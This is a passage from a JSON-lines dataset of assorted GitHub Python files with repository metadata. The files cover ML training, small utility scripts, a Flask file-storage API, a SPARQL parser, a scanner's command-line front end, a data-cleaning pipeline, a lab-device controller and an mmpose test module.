model_linear_detection.weight.to('cpu').detach().data.numpy()[0, 8].copy()\n #x_new = np.linspace(np.min(x.T[1].data.to('cpu').detach().numpy().copy()), np.max(x.T[1].data.to('cpu').detach().numpy().copy()), len(x))\n #y_curve = b + (w1 + w2 + w3 + w4 + w5 + w6 + w7 + w8) * x_new\n #print(x.T[1])\n plot(losses)\n #plot2(x.T[1], y, x_new, y_curve, losses)\n \"\"\"","repo_name":"ShineTakumi/CarDetectionPrediction-Regression-","sub_path":"CarDetection_train.py","file_name":"CarDetection_train.py","file_ext":"py","file_size_in_byte":12249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8237561426","text":"import os\n\n\ndef return_list(path: str) -> list:\n pets = []\n for name_dir in os.listdir(path):\n text_content = ''\n dogs_img = ''\n for name_file in os.listdir(f'{path}/{name_dir}'):\n if name_file.split('.')[1] == 'txt':\n with open(f'{path}/{name_dir}/{name_file}') as f:\n text_content = f.read()\n\n if name_file.split('.')[1] == 'jpg':\n dogs_img = f'{path}/{name_dir}/{name_file}'\n\n pets.append({'name': name_dir, 'img': dogs_img, 'text': text_content})\n return pets\n\n\ndef return_dict(path: str) -> dict:\n title_list = path.split('/')[-1]\n return {'title': title_list, 'pets': return_list(path)}\n\n\nDOGS = return_dict('static/content/dogs')\nCATS = return_dict('static/content/cats')\nFISH = return_dict('static/content/fish')\n\nprint(DOGS)\n","repo_name":"AntonLihtar/pet_shop","sub_path":"read_dogs.py","file_name":"read_dogs.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16263332400","text":"import matplotlib.pyplot as plt\nimport math \nimport random\nimport time\n\nrandom.seed()\n\ndot = None\narw = None\nar_len = 0.2\nstep_len = 1\n\ndef draw_car(ax,x,y,deg):\n global dot,arw,ar_len\n\n dx = ar_len* math.cos(math.radians(deg))\n dy = ar_len* math.sin(math.radians(deg))\n\n print(x,y, dx,dy)\n\n if dot is None:\n dot = ax.scatter(x, y, marker='o', color='blue')\n else:\n dot.set_offsets([x,y])\n\n if arw is not None:\n arw.remove()\n arw = ax.arrow(x, y, dx, dy, head_width=0.1, fc='blue', ec='blue')\n\n return \n\ndef update_color(color = 'blue'):\n global dot\n dot.set_color(color) # 将颜色更改为红色\n\ndef deg_noisy(n=1):\n return random.randint(-n,n)\n\n# 读入迷宫信息\nwith open('maze.txt', 'r') as f:\n M,W,H = map(int, f.readline().split())\n walls = []\n for _ in range(M):\n x1, y1, x2, y2 = map(int, f.readline().split())\n walls.append((x1, y1, x2, y2))\n\n# 初始位置\nx, y = 0.5, 0.5\ndeg=0\n\n# 绘制迷宫地图\nfig, ax = plt.subplots()\nax.set_aspect('equal')\nfig.set_size_inches(10,10)\nax.set_xlim([-1,W+1])\nax.set_ylim([-1,H+1])\nfor x1, y1, x2, y2 in walls:\n ax.plot([x1, x2], [y1, y2], color='black')\n \ndraw_car(ax,x,y,deg)\n\n\nplt.show()","repo_name":"mxy161610207/cpscps_testbed","sub_path":"test_lab/test-log/draw_maze copy.py","file_name":"draw_maze copy.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11739769265","text":"import os\r\nimport time\r\nimport pickle\r\n\r\n#creating a new customer object and saving it into a seprate .obj file.\r\ndef createCustomer():\r\n\r\n naming = input(\"name of customer:\")\r\n\r\n emailContact = input(\"email of the customer:\")\r\n\r\n phoneNumber = input(\"mobie phone number:\")\r\n\r\n #next contact needs a way to know the current date and compare the dueDate\r\n dueDate = input(\"next next time the customer will need our attetion\\n \")\r\n newCustomer = customer(naming,emailContact,phoneNumber,dueDate)\r\n saveThis = input(\"\"\"would you like to save the customer with the folowing details?\r\n %s\r\n email:%s\r\n phone number:%s\r\n next contact date %s\r\n type y to save or n to discard, then ENTER: \\n\"\"\" % (naming , emailContact, phoneNumber, dueDate ))\r\n if saveThis == \"y\":\r\n\r\n #setting path to current working directory\r\n customerFile = os.getcwd() + naming + \".obj\"\r\n\r\n #creating a variable that access the file in write mod\r\n writingCustmer = open(customerFile,\"wb\")\r\n\r\n #saving the customer details to the .obj file\r\n pickle.dump(newCustomer, writingCustmer)\r\n \r\n elif saveThis == \"n\":\r\n print(\"discarded\") \r\n return\r\n else:\r\n print(\"invaid input. discarding\")\r\n return\r\n\r\n\r\n#retriving and object and showing its contests in a readble format.\r\ndef showCustomer(NameSearch):\r\n\r\n #setting up th e path to the file in a veriabe\r\n customerFile = os.getcwd() + NameSearch + \".obj\"\r\n\r\n #a veriable that acess the file in read mod with binery \r\n reading = open(customerFile, \"rb\")\r\n\r\n #loading the file with pickle\r\n current = pickle.load(reading)\r\n\r\n #printing the customer attrabuts\r\n print(\r\n\"\"\"name:%s\r\nphone:%s\r\nemail:%s\r\nnext date to contact the customer:%s\"\"\"%(current.name, current.phone, current.email, current.nextContact))\r\n\r\n return\r\n\r\n\r\n\r\n\r\n#customer class takes the customer details and logs the date of creation of the object. an empty log exists in the form of a lists veriable with no enterys\r\n#has function of LogNew that saves an enetry date and a stractured text(string)enetery followed by a customized note\r\n\r\n#a methid that uses time.strftime(Y%-m%-d%) that compares the due date with the current date and adds the ustomer to a list in the main menu\r\n\r\nclass customer:\r\n \"customer details and contact information, contact log\"\r\n def __init__(self,name, email, phone, nextContact):\r\n\r\n #custmmer name and last name\r\n self.name = name\r\n\r\n #customer email of contact\r\n self.email = email\r\n\r\n #customer mobile phone number\r\n self.phone = phone\r\n \r\n #next date contact this customer\r\n self.nextContact = nextContact\r\n\r\n self.log = []\r\n #date of submission of the customer to the system\r\n logDate = time.asctime(time.localtime(time.time()))\r\n\r\n\r\n #log is a dictionery with the date:string format\r\n log = {logDate:\"i was created\"}\r\n #NewLog method for creating a new log in the log variable \r\n def newLog(self):\r\n \r\n newlog[logDate :s]\r\n return\r\n \r\n \r\n\r\n\r\n \r\n","repo_name":"aswe323/backup","sub_path":"matanCRC.py","file_name":"matanCRC.py","file_ext":"py","file_size_in_byte":3290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71742013928","text":"#! python3\n\n# madlib-solidifying.py - A program which replace specified words with user inputs, save it to a new file and prints it to the console.\n\n# Create variable with words to exchange.\nwords = ['ADJECTIVE', 'ADVERB', 'VERB', 'NOUN']\n\n# Open file with text to check.\nwith open('textfile.txt') as textfile:\n# Split text.\n splitted_text = textfile.read().split()\n print(splitted_text)\n\n# Open new file to save new text and use for loop to exchange specified words.\nwith open('changedtext.txt', 'w') as newtext:\n for x in splitted_text:\n for y in words:\n if x.startswith(y):\n word = input('Please enter ' + y.lower() + ':' + '\\n')\n newtext.write(x.replace(y, word) + ' ')\n break\n else:\n newtext.write(x + ' ')\n\n# Remove space from the end of the text and print new text to the screen.\nwith open('changedtext.txt') as newtext:\n content = ' '.join(x.strip() for x in newtext.readlines())\n print(content)\n\n# Save changed text without needless space at the end.\nwith open('changedtext.txt', 'w') as newtext:\n newtext.write(content)\n","repo_name":"jakubfolta/MadLibs","sub_path":"madlib-solidifying.py","file_name":"madlib-solidifying.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15808483028","text":"from flask_restful import Resource, abort, marshal, request, reqparse\nfrom flask_jwt_extended import jwt_required, get_jwt_identity\nfrom werkzeug.datastructures import FileStorage\nfrom Serializers.StorageFields import storage_fields\nfrom Serializers.StorageElementFields import storage_element_fields\nfrom Models.Users.UserModel import UserModel\n\nfrom Utils.file_operators import get_file_size, GigaByte\n\nclass UserStorageResource(Resource):\n @jwt_required\n def get(self):\n user_identity = get_jwt_identity()\n user = UserModel.get_user(login = user_identity)\n if user is None:\n abort(500, message = 'Something gone wrong.')\n return marshal(user.storage, storage_fields), 200\n \n @jwt_required\n def post(self):\n user_identity = get_jwt_identity()\n user = UserModel.get_user(login = user_identity)\n if user is None:\n abort(500, message = 'Something gone wrong.')\n parser = reqparse.RequestParser()\n parser.add_argument('file' , required = True, type=FileStorage, location = 'files')\n file = parser.parse_args()['file']\n file_size = get_file_size(file)\n used_space = user.storage.used_space\n if file_size + used_space >= 10*GigaByte:\n abort(400, message = 'File storage capacity exceeded. File not uploaded')\n stElement = user.storage.add_file(file)\n return marshal(user.storage, storage_fields), 200\n\n @jwt_required\n def delete(self): \n user_identity = get_jwt_identity()\n user = UserModel.get_user(login = user_identity)\n if user is None:\n abort(500, message = 'Something gone wrong.')\n user.storage.clear()\n return marshal(user.storage, storage_fields), 204\n \n","repo_name":"cezary-kania/UploadIO-api","sub_path":"src/Resources/Users/Storage/UserStorageResource.py","file_name":"UserStorageResource.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16017063008","text":"import rdflib\nimport re\n\nclass Query:\n def __init__(self, filename):\n self.filename = filename\n with open(filename, 'r') as f:\n text = f.read().replace(\"\\\\n\\\\\\n\", \" \")\n\n namespace_pattern = \"prefix (\\w*): <([^>]*)>\"\n matches = re.findall(namespace_pattern, text)\n self.namespaces = {}\n for m in matches:\n self.namespaces[m[0]] = rdflib.Namespace(m[1])\n\n sql_pattern = \"sql=(.*)\\n\"\n matches = re.findall(sql_pattern, text)\n assert len(matches) == 1\n self.sql_query = matches[0]\n # print(\"SQL: \", self.sql_query)\n\n sparql_pattern = \"sparql.*(SELECT.*)\\n\"\n matches = re.findall(sparql_pattern, text)\n assert len(matches) == 1\n self.sparql_query = matches[0]\n # print(\"SPARQL: \", self.sparql_query)\n\n triples_pattern = \"WHERE {(.*)}\"\n matches = re.findall(triples_pattern, self.sparql_query)\n if len(matches) != 1:\n triples_pattern = \"{(.*)}\"\n matches = re.findall(triples_pattern, text)\n assert len(matches) == 1\n \n self.triples = recover_triples(matches[0])\n self.logic = triples_to_logic(self.triples)\n\n selects_pattern = \"SELECT(.*)WHERE\"\n matches = re.findall(selects_pattern, self.sparql_query)\n if len(matches) != 1:\n selects_pattern = \"SELECT(.*){\"\n matches = re.findall(selects_pattern, text)\n assert len(matches) == 1\n self.selects = recover_selects(matches[0])\n # print(\"SELECTS: \", self.selects)\n\n def create_supervision(self):\n if len(self.triples) > 1:\n return False, None, None\n \n subj, pred, obj = self.triples[0]\n if pred == \"rdf:type\":\n pred = obj\n pred = re.sub(\"<.*#(.*)>\", r'\\1', pred)\n pred = re.sub(\":\", \"\", pred)\n \n sql_query = self.sql_query.replace(\"COUNT(*)\", \"x\")\n # print(\"query: \", sql_query)\n return True, pred, sql_query\n\n\n\ndef recover_triples(triplestring):\n parts = triplestring.split()\n triples = []\n subject = None\n predicate = None\n position = 0\n for p in parts:\n if p == \".\":\n continue\n if position == 0: # expecting subject\n subject = p\n position = 1\n elif position == 1: # expecting object\n predicate = p\n if predicate == \"a\":\n predicate = \"rdf:type\"\n position = 2\n elif position == 2:\n if p[-1] == \";\":\n triples.append((subject, predicate, p[:-1]))\n position = 1\n else:\n triples.append((subject, predicate, p))\n position = 0\n return triples\n\ndef recover_selects(selectstring):\n selects = selectstring.split()\n\n # TODO only support list of ?varname at the moment\n for s in selects:\n if s[0] != \"?\":\n return None\n return selects\n\ndef triples_to_logic(triples):\n logic = []\n reformulated = []\n identities = []\n for t in triples:\n if t[1] == \"rdf:type\":\n logic.append([t[2],t[0]])\n h = hash(t[2])\n # reformulated.\n else:\n logic.append([t[1],t[0], t[2]])\n return logic\n","repo_name":"zsoltzombori/mapping","sub_path":"extract/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":3283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5472230726","text":"# /usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\n@File : console.py\n@Time : 2020/12/24 16:36:36\n@Author: Morker\n@Blog : https://96.mk/\n@Email : i@96.mk\n\nIf you don't go through the cold, you can't get the fragrant plum blossom.\n'''\n\nimport os\nimport sys\nimport argparse\nfrom lib.option import initOption\nfrom config.config import pyVersion, urlVersion\nfrom config.data import logger\n\n\ndef version_check():\n if pyVersion < \"3.7.3\":\n logger.error(\n \"此Python版本 ('{0}') 不兼容,成功运行Glass你必须使用版本 >= 3.7.3 (访问 ‘https://www.python.org/downloads/’)\".format(pyVersion))\n exit(0)\n\n if urlVersion > \"1.25.8\" and pyVersion > \"3.8\":\n logger.error(\"urllib3库版本 ('{0}') 不兼容,代理容易出错\".format(urlVersion))\n logger.info('运行 (python3 -m pip install -U \"urllib3==1.25.8\") 进行库降低版本')\n logger.info(\n \"或者运行 (python3 -m pip install -r requirements.txt) 进行全部库的安装\")\n exit(0)\n\n\ndef modulePath():\n \"\"\"\n This will get us the program's directory, even if we are frozen\n using py2exe\n \"\"\"\n\n try:\n _ = sys.executable if hasattr(sys, \"frozen\") else __file__\n except NameError:\n _ = inspect.getsourcefile(modulePath)\n\n return os.path.dirname(os.path.realpath(_))\n\n\ndef main():\n version_check()\n parser = argparse.ArgumentParser(description=\"Glass scan.\")\n parser.add_argument('-i', '--ip', type=str,\n dest='ip', help='Input your ip.')\n parser.add_argument('-f', '--file', type=str,\n dest='file', help='Input your ips.txt.')\n parser.add_argument('-u', '--url', type=str,\n dest='url', help='Input your url.')\n parser.add_argument('-w', '--web', type=str,\n dest='web', help='Input your webs.txt.')\n parser.add_argument('--proxy', type=str, dest='proxy',\n help='Input your proxy options(all or cn) or proxy address(127.0.0.1:8080).')\n parser.add_argument('--proxy-list', type=str,\n dest='proxylist', help='List the proxys.')\n parser.add_argument('-v', '--version', dest='version',\n action='store_true', help=\"Show program's version number and exit.\")\n parser.add_argument('--update', dest='updateprogram',\n action='store_true', help=\"Update the program.\")\n parser.add_argument('-o', '--output', type=str,\n dest='outputTarget', help='Select the output format.')\n parser.add_argument('-s', '--search', type=str,\n dest='search', help='Choose your search engine.')\n args = parser.parse_args()\n usage = '''\nUsage: python3 {} -i 127.0.0.1 or 127.0.0.0/24\nUsage: python3 {} -u 127.0.0.1 -s eye or fofa\nUsage: python3 {} -f ips.txt\nUsage: python3 {} -u https://96.mk/\nUsage: python3 {} -w webs.txt\nUsage: python3 {} --proxy-list all or cn\nUsage: python3 {} (-i -f -u -w) 127.0.0.1 or 127.0.0.0/24 --proxy all or cn\nUsage: python3 {} --update\nUsage: python3 {} -u https://96.mk/ -o html\n '''.format(parser.prog, parser.prog, parser.prog, parser.prog, parser.prog, parser.prog, parser.prog, parser.prog, parser.prog)\n root = modulePath()\n initOption(usage, root, args.__dict__)\n","repo_name":"s7ckTeam/Glass","sub_path":"console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":3332,"program_lang":"python","lang":"en","doc_type":"code","stars":897,"dataset":"github-code","pt":"53"} +{"seq_id":"73439177127","text":"dados= []\ncontador = 0\nsoma = 0\nfor i in range(0,6):\n dados.append(float(input()))\n if dados[i] > 0:\n contador += 1\n soma += dados[i]\n\nmedia = soma / contador\n\nprint('{} valores positivos'.format(contador))\nprint('{:.1f}'.format(media))\n","repo_name":"gabrielreiss/URI","sub_path":"1064.py","file_name":"1064.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74325833769","text":"#https://algoprog.ru/material/p915\n\nn = int(input())\narray = [*map(int, input().split())]\n\ndp = [0] * (n + 1)\ndp[1] = array[0]\nfor i in range(2, n + 1):\n dp[i] = min(dp[i-1], dp[i-2]) + array[i-1]\nprint(dp[-1])\n","repo_name":"dmironov1993/algoprog","sub_path":"Уровень2/Уровень2Б/Простые_задачи_на_ДП/Платная_лестница.py","file_name":"Платная_лестница.py","file_ext":"py","file_size_in_byte":212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28376243686","text":"import utils\n\nfrom typing import List, Optional, Union\nfrom postDB import types, Model, Column\n\nfrom ..permissions import Administrator\nfrom ..permissions.bases import BasePermission\n\n\nclass Role(Model):\n \"\"\"\n Role class\n\n Database Attributes:\n Attributes stored in the `roles` table.\n :param int id: Role ID.\n :param str name: Role name.\n :param int color: The color this role is.\n :param int position: The position this role is in the hierarchy.\n :param int permissions: The permissions this role has.\n \"\"\"\n\n id = Column(types.Integer(big=True), primary_key=True)\n name = Column(types.String(length=32), unique=True)\n position = Column(types.Real)\n color = Column(types.Integer, nullable=True)\n permissions = Column(types.Integer, default=0)\n\n def __repr__(self):\n return (\n \"\".format(self)\n )\n\n @classmethod\n async def fetch(cls, id: Union[str, int]) -> Optional[\"Role\"]:\n \"\"\"Fetch a role with the given ID.\"\"\"\n query = \"\"\"SELECT * FROM roles WHERE id = $1;\"\"\"\n role = await cls.pool.fetchrow(query, int(id))\n\n if role is not None:\n role = cls(**role)\n\n return role\n\n def has_permissions(self, permissions: List[Union[int, BasePermission]]) -> bool:\n \"\"\"Returns `True` if this role has all provided permissions\"\"\"\n if self.permissions & Administrator().value:\n return True\n\n all_perms = 0\n for perm in permissions:\n if isinstance(perm, int):\n all_perms |= perm\n else:\n all_perms |= perm.value\n\n return self.permissions & all_perms == all_perms\n\n def has_permission(self, permission: Union[BasePermission, int]) -> bool:\n \"\"\"Returns `True` if this role has the provided permission\"\"\"\n if self.permissions & Administrator().value:\n return True\n\n if isinstance(permission, int):\n return self.permissions & permission == permission\n\n return self.permissions & permission.value == permission.value\n\n @property\n def created_at(self):\n return utils.snowflake_time(self.id)\n","repo_name":"Tech-With-Tim/models","sub_path":"roles/role.py","file_name":"role.py","file_ext":"py","file_size_in_byte":2393,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"24658184976","text":"from bs4 import BeautifulSoup\n\nif __name__ == \"__main__\":\n from utils import *\nelse:\n from .utils import *\n\n\nclass Lylblog(Site):\n def __init__(self):\n super(Site, self)\n\n def matcher(self, url: str):\n return 'lylblog.com' in url\n\n def solver(self, url: str):\n res = get(\"https://www.lylblog.com/\")\n soup = BeautifulSoup(res, features=\"lxml\")\n posts = []\n for item in soup.select(\"article.post\"):\n link = item.select_one(\"a.post-title\")\n posts.append(\n Post(\n link.get_text(),\n link.get(\"href\"),\n parseToUnix(item.select_one(\"time\").get_text())\n ))\n return posts\n\n\nif __name__ == '__main__':\n t = Lylblog()\n print(t.matcher(\"https://www.lylblog.com/\"))\n print(t.solver(\"https://www.lylblog.com/\"))\n","repo_name":"OhYee/blotter","sub_path":"tools/spider/sites/lylblog.py","file_name":"lylblog.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"53"} +{"seq_id":"19226337807","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Oct 24 22:54:58 2020\r\n\r\n@author: ZY\r\n\"\"\"\r\nimport sys\r\nimport pandas as pd\r\nfrom sqlalchemy import create_engine\r\n# print ('Number of arguments:', len(sys.argv), 'arguments.')\r\n# print ('Argument List:', str(sys.argv))\r\n\r\n\r\ndef print_input(messages_filepath, categories_filepath, database_filepath):\r\n \"\"\" \r\n A function to print out the input file paths. \r\n \r\n Parameters\r\n ----------\r\n messages_filepath : String\r\n The file path for the message data.\r\n categories_filepath : String\r\n The file path for the category data\r\n database_filepath : String\r\n The file path for the database \r\n\r\n Returns\r\n -------\r\n messages : pandas.dataframe\r\n a dataframe that contains the message data\r\n categories : pandas.dataframe\r\n a dataframe that contains the category data\r\n\r\n \"\"\"\r\n print ('The message file is:', messages_filepath)\r\n messages = pd.read_csv(messages_filepath)\r\n print ('The category file is:', categories_filepath)\r\n categories = pd.read_csv(categories_filepath)\r\n print ('The saving database is:', database_filepath) \r\n return messages, categories\r\n\r\ndef prepare_data(messages, categories):\r\n \"\"\"\r\n Merge the two dataframe\r\n\r\n Parameters\r\n ----------\r\n messages : pandas.dataframe\r\n a dataframe that contains the message data\r\n categories : pandas.dataframe\r\n a dataframe that contains the category data\r\n\r\n Returns\r\n -------\r\n df : pandas.dataframe\r\n merged dataframe\r\n\r\n \"\"\" \r\n \r\n df = pd.concat([messages.set_index('id'),categories.set_index('id')], axis=1).reset_index()\r\n \r\n # make a new dataframe that contains splitting of categories column\r\n categories = df['categories'].str.split(';', expand = True)\r\n row = categories.loc[1,:]\r\n category_colnames = [xx[:-2] for xx in row]\r\n categories.columns = category_colnames\r\n for column in categories.columns:\r\n # set each value to be the last character of the string\r\n categories[column] = [xx[-1:] for xx in categories[column]] \r\n # convert column from string to numeric\r\n categories[column] = pd.to_numeric(categories[column])\r\n \r\n # Drop the original 'categories' and merge with new one. \r\n df.drop(labels=['categories'], axis=1,inplace=True)\r\n df = pd.concat([df,categories], axis =1)\r\n \r\n # drop duplicates\r\n df.drop_duplicates(subset=['message'], inplace= True)\r\n \r\n # replace '2' by '1' in the column 'related'\r\n df['related'].replace(2,1, inplace=True)\r\n \r\n # the column 'military' has only zero. Cannot be used in training. Delete the column\r\n # df.drop(labels=['military'],axis=1,inplace=True)\r\n \r\n return df\r\n\r\n\r\ndef save_database(df, database_filepath):\r\n '''\r\n Save the data to local database\r\n\r\n Parameters\r\n ----------\r\n df : pandas.dataframe\r\n data to be saved\r\n database_filepath : String\r\n The file path for the database \r\n\r\n Returns\r\n -------\r\n None.\r\n\r\n '''\r\n \r\n engine = create_engine('sqlite:///' + database_filepath)\r\n table_name = database_filepath.replace('/', '.').split('.')[-2]\r\n df.to_sql(table_name, engine, index=False)\r\n\r\ndef main():\r\n '''\r\n The main function for the file\r\n\r\n Returns\r\n -------\r\n None.\r\n\r\n '''\r\n if len(sys.argv) == 4:\r\n \r\n messages_filepath, categories_filepath, database_filepath = sys.argv[1:]\r\n # Read the input files\r\n print('Loading data...\\n MESSAGES: {}\\n CATEGORIES: {}'\r\n .format(messages_filepath, categories_filepath))\r\n messages, categories = print_input(messages_filepath, \r\n categories_filepath, \r\n database_filepath)\r\n \r\n # Prepare the output data\r\n print('Loading data...\\n MESSAGES: {}\\n CATEGORIES: {}'\r\n .format(messages_filepath, categories_filepath))\r\n print('Cleaning data...')\r\n df = prepare_data(messages, categories)\r\n \r\n # Save to a local sql file\r\n print('Saving data...\\n DATABASE: {}'.format(database_filepath))\r\n save_database(df, database_filepath)\r\n \r\n print('Cleaned data saved to database!')\r\n \r\n else:\r\n print('Please provide the filepaths of the messages and categories '\\\r\n 'datasets as the first and second argument respectively, as '\\\r\n 'well as the filepath of the database to save the cleaned data '\\\r\n 'to as the third argument. \\n\\nExample: python process_data.py '\\\r\n 'disaster_messages.csv disaster_categories.csv '\\\r\n 'DisasterResponse.db')\r\n \r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"hellogaga/Disaster_Response_Message_Classification","sub_path":"data/process_data.py","file_name":"process_data.py","file_ext":"py","file_size_in_byte":4824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17385864018","text":"import pandas as pd\n\n# Read csv files\ndf_processed_data = pd.read_csv('./data/processed_data.csv', index_col=[0])\ndf_new_data = pd.read_csv('./data/new_data.csv', index_col=[0])\n\n# Joining\ndf_ = pd.concat([df_processed_data, df_new_data], axis=1)\n\n# Saving to csv file\ndf_.to_csv('./data/samambaia_houses.csv')","repo_name":"davi-santos/samambaia-house-price-prediction","sub_path":"JoinCSV.py","file_name":"JoinCSV.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"75003857767","text":"import logging\nimport os\nimport queue\nimport re\nimport threading\nimport time\nfrom typing import Dict\n\nimport psutil\n\nfrom devices.common.ssh_connection import SshConnection\n\nDEVICE_SCLK_FREQ = 200_000_000.\nMAX_SAMPLES_PER_SEC = 40_000.\n\n\nclass NeuroprobeDeviceProcess:\n def __init__(self, rcv_queue, send_queue, parent_pid, config: Dict):\n self.rcv_queue = rcv_queue\n self.send_queue = send_queue\n self.parent_pid = parent_pid\n self.last_parent_exit_check_time = time.time()\n\n self.ssh_connection = SshConnection(config)\n self.last_ssh_connection_check = time.time()\n self.connected = False\n\n self.device_init_commands = config['device_init_commands']\n self.log = logging.getLogger(__name__)\n self.log.setLevel(logging.INFO)\n\n # It's convenient for the device to always start in \"not connected\" state.\n # This makes device switching logic easier.\n self.emit_device_state({'isConnected': False})\n\n def exec_device_command(self, command: str):\n self.ssh_connection.exec_device_command(command)\n self.check_and_send_device_state()\n\n def initialize_device(self):\n num_init_steps = len(self.device_init_commands)\n self.emit_device_state({'initState': 'INITIALIZING',\n 'initStepDone': 0,\n 'numInitSteps': num_init_steps})\n\n for i in range(num_init_steps):\n command = self.device_init_commands[i]\n self.emit_device_state({'log': command})\n result = self.ssh_connection.exec_ssh(self.device_init_commands[i])\n self.emit_device_state({'initState': 'INITIALIZING',\n 'initStepDone': i,\n 'numInitSteps': num_init_steps,\n 'log': result})\n\n self.check_and_send_device_state()\n\n def check_and_send_device_state(self):\n device_state_str = self.ssh_connection.exec_get_device_state()\n if device_state_str is None:\n self.emit_device_state({'isConnected': False})\n return\n\n match_groups = \\\n re.match('([0-9a-f]+),([0-9a-f]+),([01]),([01]),([01]),([01]),([01]),([01]),([0-9a-f]+),([01]),([01])',\n # rdh_SampleDur^ rhd_BootFailed^ ^rhd_SampleActive\n device_state_str.strip())\n\n device_state_msg = {'isConnected': True}\n\n if not match_groups:\n device_state_msg['initState'] = 'NOT_INITIALIZED'\n\n elif (match_groups.group(10) != \"0\"): # or (match_groups.group(3) != \"00000002\"):\n device_state_msg['initState'] = \"INIT_FAILED\"\n\n else:\n device_state_msg['initState'] = 'INITIALIZED'\n device_state_msg['isSampling'] = match_groups.group(11) == \"1\"\n\n # FIXME: get sampledur position from Rakshith\n sample_duration_sclk = int(match_groups.group(9), 16)\n samples_per_sec = DEVICE_SCLK_FREQ / sample_duration_sclk\n device_state_msg['samplesPerSec'] = samples_per_sec\n\n self.emit_device_state(device_state_msg)\n\n def process_message(self, msg: Dict):\n if 'checkDeviceState' in msg:\n self.check_and_send_device_state()\n\n if 'initializeDevice' in msg:\n self.initialize_device()\n\n if 'command' in msg:\n self.exec_device_command(msg['command'])\n\n if 'setSamplingRate' in msg:\n self.set_sampling_rate(msg['setSamplingRate'])\n\n if 'startSampling' in msg:\n self.exec_device_command('rhd_sample_en')\n\n if 'stopSampling' in msg:\n self.exec_device_command('rhd_sample_dis')\n\n\n def process_messages(self):\n while True:\n self.exit_if_parent_exists()\n\n try:\n msg = self.rcv_queue.get_nowait()\n self.process_message(msg)\n except queue.Empty:\n break\n\n def run_loop(self):\n while True:\n now = time.time()\n\n if now > (self.last_ssh_connection_check + 5):\n self.last_ssh_connection_check = now\n conn_check_thread = threading.Thread(target=self.run_connection_check)\n conn_check_thread.start()\n\n self.process_messages()\n time.sleep(0.001)\n\n def run_connection_check(self):\n was_connected = self.connected\n self.connected = self.ssh_connection.ensure_connection()\n\n if not was_connected and self.connected:\n self.check_and_send_device_state()\n\n else:\n self.emit_device_state({'isConnected': self.connected})\n\n def exit_if_parent_exists(self):\n now = time.time()\n\n if now <= self.last_parent_exit_check_time + 1:\n return\n\n self.last_parent_exit_check_time = now\n\n if self.parent_pid not in psutil.pids():\n os.abort()\n\n def emit_device_state(self, state):\n self.send_queue.put_nowait({'state': state})\n\n def set_sampling_rate(self, rate):\n adjusted_rate = min(rate, MAX_SAMPLES_PER_SEC)\n sample_duration_sck = int(round(DEVICE_SCLK_FREQ / adjusted_rate))\n self.exec_device_command(f'rhd_sample_dur {sample_duration_sck}')\n\n\ndef run_controller(rcv_queue, send_queue, parent_pid, config: Dict):\n stimulator = NeuroprobeDeviceProcess(rcv_queue, send_queue, parent_pid, config)\n stimulator.run_loop()\n","repo_name":"OpenMEA/OpenMEA_Studio","sub_path":"engine/devices/neuroprobe/neuroprobe_device_process.py","file_name":"neuroprobe_device_process.py","file_ext":"py","file_size_in_byte":5517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13921265111","text":"from tempfile import NamedTemporaryFile, TemporaryDirectory\n\nimport numpy as np\nimport pytest\nimport torch\n\nimport mmdeploy.backend.onnxruntime as ort_apis\nfrom mmdeploy.codebase import import_codebase\nfrom mmdeploy.utils import Codebase, load_config\nfrom mmdeploy.utils.test import SwitchBackendWrapper\n\ntry:\n import_codebase(Codebase.MMPOSE)\nexcept ImportError:\n pytest.skip(\n f'{Codebase.MMPOSE.value} is not installed.', allow_module_level=True)\n\nfrom .utils import (generate_datasample, generate_mmpose_deploy_config,\n generate_mmpose_task_processor)\n\nmodel_cfg_path = 'tests/test_codebase/test_mmpose/data/model.py'\nmodel_cfg = load_config(model_cfg_path)[0]\ndeploy_cfg = generate_mmpose_deploy_config()\n\nonnx_file = NamedTemporaryFile(suffix='.onnx').name\ntask_processor = generate_mmpose_task_processor()\nimg_shape = (192, 256)\nheatmap_shape = (48, 64)\n# mmpose.apis.inference.LoadImage uses opencv, needs float32 in\n# cv2.cvtColor.\nimg = np.random.rand(*img_shape, 3).astype(np.float32)\nimg_path = 'tests/data/tiger.jpeg'\nnum_output_channels = 17\n\n\n@pytest.mark.parametrize('imgs', [img, img_path])\ndef test_create_input(imgs):\n inputs = task_processor.create_input(imgs, input_shape=img_shape)\n assert isinstance(inputs, tuple) and len(inputs) == 2\n\n\ndef test_build_pytorch_model():\n from mmpose.models.pose_estimators.base import BasePoseEstimator\n model = task_processor.build_pytorch_model(None)\n assert isinstance(model, BasePoseEstimator)\n\n\n@pytest.fixture\ndef 